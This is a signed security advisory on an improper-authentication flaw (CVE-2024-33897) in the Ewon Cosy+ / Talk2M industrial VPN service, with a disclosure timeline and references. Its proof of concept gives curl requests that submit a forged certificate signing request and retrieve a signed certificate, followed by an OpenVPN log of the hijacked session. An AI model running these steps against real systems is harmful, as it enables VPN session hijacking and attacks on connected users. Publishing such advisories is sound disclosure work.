Ewon Cosy+ / Talk2M Remote Access Solution Improper Authentication

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2024-043  
Product: Ewon Cosy+ / Talk2M Remote Access Solution  
Manufacturer: HMS Industrial Networks AB  
Affected Version(s): N.A.  
Tested Version(s): N.A.  
Vulnerability Type: Improper Authentication (CWE-287)  
Risk Level: High  
Solution Status: Fixed  
Manufacturer Notification: 2024-04-17  
Solution Date: 2024-04-18  
Public Disclosure: 2024-08-11  
CVE Reference: CVE-2024-33897  
Author of Advisory: Moritz Abrell, SySS GmbH  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.  
  
The manufacturer describes the product as follows (see [1]):  
  
"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
During account assignment in the Talk2M platform, a Cosy+ device  
generates and sends a certificate signing request (CSR) to the back end.  
This CSR is then signed by the manufacturer and used for OpenVPN  
authentication by the device afterward.  
  
Since the common name (CN) of the certificate is specified by the device  
and used in order to assign the OpenVPN session to the corresponding  
Talk2M account, an attacker with root access to a Cosy+ device is able  
to manipulate the CSR and get correctly signed certificates for foreign  
devices.  
  
Using these certificates for OpenVPN authentication results in hijacking  
the VPN session and allows for further attacks, e.g.:  
  
- - Impacting the accessibility of the original device  
- - Attacking the Talk2M-connected user device via the VPN connection  
- - Eavesdropping and manipulating the network communication of connected  
users  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
Note: Since the X.509 client certificate of a Cosy+, which is used for  
authentication against the Talk2M API, is handled by the hardware  
security module (HSM), root access to a Cosy+ device is required.  
  
  
1. Exporting the OpenSSL engine to use the hardware security module:  
  
$ export OPENSSL_CONF=/etc/ssl/se050_openssl.cnf  
$ export EX_SSS_BOOT_SSS_PORT=/dev/i2c-0  
  
  
2. Sending a self-created CSR to the Talk2M API:  
  
$ curl --path-as-is -i -s -k -X $'POST' \  
-H $'Host: eu.device.talk2m.com' -H $'Accept: application/json' \  
-H $'Content-Type: application/json' -H $'Ewon-Serial: 2403-0999-25' \  
-H $'Device-State: AccountLinked' -H $'Content-Length: 768' \  
--data-binary $'{\x0a\x09\"csr\":  
\x09\"-----BEGIN CERTIFICATE REQUEST-----\\nMIIB6zCCAUwCAQAwgaY  
xCzAJBgNVBAYTAkJFMRcwFQYDVQQIEw5CcmFiYW50IFdh\\nbGxvbjERMA8GA1U  
EBxMITml2ZWxsZXMxIzAhBgNVBAoTGkhNUyBJbmR1c3RyaWFs\\nIE5ldHdvcmt  
zIFNBMRAwDgYDVQQLEwdFd29uIEJVMRYwFAYDVQQDEw1EMjMwNy0w\\nMTAxLTI  
1MRwwGgYJKoZIhvcNAQkBFg1pbmZvQGV3b24uYml6MIGbMBAGByqGSM49\\nAgE  
GBSuBBAAjA4GGAAQBaUGPo1FIjOOqyd1M47M2fcLQ2MN3aj7wI8pBYmopdSEY\\  
nKszktBPre3AZ74E4326+vUej6nBG/17SWNb+VZPEyXYBAvEyyvsXfy/UlnB6NX  
aj\\n6rrmy2pqP5bKN/1yR3reqlA6+9rdYzcH3ESJvp9hTkZnV4qbdNjTtqSfZO  
4zu1Zn\\nE+CgADAKBggqhkjOPQQDAgOBjAAwgYgCQgDVbJN5MJJZnkRRvNwwXu  
6GrvILBN6H\\nxTwR3inwMxLf+a/o+SFiqq5Pvsm2UXebVSD3osopdnJ8cxzTzi  
PopsLiXAJCAa5K\\n+0T0H8VAvBzKTQkpiHHzW9JkDvIDaJA4WtYzA+KT7jo4kW  
vQIr7rBBOlILoofQzv\\nypCqHaugjHhdeuJecIiq\\n-----END CERTIFICAT  
E REQUEST-----\\n\"\x0a}' \  
$'https://eu.device.talk2m.com/certificates/csr' \  
--cert /tmp/birth_key_crt.pem --key /tmp/birth_key_ref.pem  
  
  
3. Requesting the signed certificate:  
  
$ curl -i -k -H $'Device-State: AccountLinked' \  
https://device.talk2m.com/certificates/deviceCertificate \  
--cert birth_key_crt.pem --key birth_key_ref.pem  
  
  
4. Talk2M response:  
  
HTTP/1.1 200  
date: Tue, 16 Apr 2024 13:09:57 GMT  
server: Apache  
ewon-server-time: 1713272998  
device-state: VpnProvisioned  
content-type: application/json  
transfer-encoding: chunked  
  
{"certificate":"-----BEGIN CERTIFICATE-----\nMIIDTjCCAjagAwIBA[...]  
KsxyR8w==\n-----END CERTIFICATE-----"}  
  
  
5. This signed certificate and the used key can be used for OpenVPN  
authentication. The CN will be used to assign the session to the  
corresponding Talk2M account. This also overwrites a potential  
current VPN session of the original device:  
  
$ openvpn --config attacker.ovpn  
Attempting to establish TCP connection with [AF_INET]51.195.79.69:443  
TCP connection established with [AF_INET]51.195.79.69:443  
TCPv4_CLIENT link remote: [AF_INET]51.195.79.69:443  
VERIFY OK: depth=1, C=BE, ST=Brabant Wallon, L=Nivelles, O=eWON sa,  
OU=Talk2M, CN=Talk2M Certification Authority,  
[email protected]  
VERIFY KU OK  
Validating certificate extended key usage  
++ Certificate has EKU (str) TLS Web Server Authentication,  
expects TLS Web Server Authentication  
VERIFY EKU OK  
VERIFY OK: depth=0, C=BE, ST=Brabant Wallon, L=Nivelles,  
O=HMS Industrial Networks SA, OU=Talk2M, CN=server-device,  
[email protected]  
Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384,  
peer certificate: 2048 bit RSA, signature: RSA-SHA1  
[server-device] Peer Connection Initiated with [AF_INET]51.195.79.69:443  
TUN/TAP device tap0 opened  
net_addr_ll_set: lladdr 00:03:27:d8:68:84 for tap0  
TUN/TAP link layer address set to 00:03:27:d8:68:84  
net_iface_mtu_set: mtu 1500 for tap0  
net_iface_up: set tap0 up  
net_addr_v4_add: 10.37.211.214/16 dev tap0  
Data Channel: cipher 'AES-256-GCM', peer-id: 0, compression: 'lzo'  
Timers: ping 10, ping-exit 40  
Initialization Sequence Completed  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
The vulnerability was fixed in the back end by HMS on April 18, 2024.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2024-04-09: Potential vulnerability discovered  
2024-04-16: Call with the manufacturer and requested a Talk2M account  
with an assigned device to verify the potential vulnerability  
2024-04-16: Manufacturer provided a Talk2M account with an assigned device  
2024-04-16: Vulnerability confirmed  
2024-04-16: Short update about the state sent to the manufacturer  
2024-04-16: Security advisory inculding technical details provided to  
the manufacturer  
2024-04-18: Vulnerability fixed by the manufacturer  
2024-04-30: CVE ID CVE-2024-33897[5] assigned by the manufacturer  
2024-07-12: Manufacturer asked for reviewing the blog post draft  
2024-07-12: Confirmed reviewing the blog post is possible and asking for  
the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post  
2024-07-24: Manufacturer also asked for an appointment to discuss the blog post  
2024-07-29: Discussion with HMS about the blog post and final publication  
actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Ewon Cosy+ product website  
https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-043  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-043.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy  
[4] Manufacturer note  
https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf  
[5] CVE-2024-33897  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33897  
[6] Blog post  
https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[7] DEF CON talk  
https://defcon.org/html/defcon-32/dc-32-speakers.html#54521  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Moritz Abrell of SySS GmbH.  
  
E-Mail:[email protected]  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay47wACgkQrgyb+PE0  
i1O5RQ/9HM9YIPRLVqGSRNPYW45F9e1wj9uHTvt78XjRng5lbRPpgWAO1G6UVQvS  
ebugxzjAtGrdMxx8X1NHd9vbshyAHj/q33Y0fkQ5TB2hnSMkn2nbXTEZKIIS6wK0  
XnJhB31iVnkgMeNFQ0SwSutBnnxJ7mvQ6vUBG210DSHjpQtu8rWuCyrf3BcSCJ/I  
nT79b7TJOxOMD1y5VAeVP6Pehh+IlJgvSItXZyOjs4wgt/+z+wVoKnYdqSAHpovI  
/rjVbtp7cvIhQInghnDoRWfXce34bk07geOB4VGg7bhxGCeWbJZq/Dxrag5jJb9l  
0zx2K4M8ZTwFcrtAliFgyzrIgvjfOk9HCZasSMl20znj4+3QaAWpfn2oMmCQCaLg  
6hBqAQ+s66Cv8Br24WKdlnj3nrsn+SAX2TKDxajt+WiDkXKvsLPs8XCmzVN8jViK  
nN/dJ3chba4yhqmpft1wRXG71VvBdbv3pkLp7usKszUrul8M802JzF2aGTUsiKgQ  
QSxpNhSP4aC2jqjt1OpX7W6NKD1nIhg0VrduxlwlAcQ2uffbh8xtak1MgZry0/yP  
6j9a15DOTJshMeud8R3Bkfjms/0Jzm43uyjIeRGNP79UyohsTX4jOJAsUYr0efUZ  
/55N3HiCD94jYoee5E3sF1vWlrhVDzkWJ7Q8u/W4osSIwMNikTc=  
=JS3w  
-----END PGP SIGNATURE-----  
  
`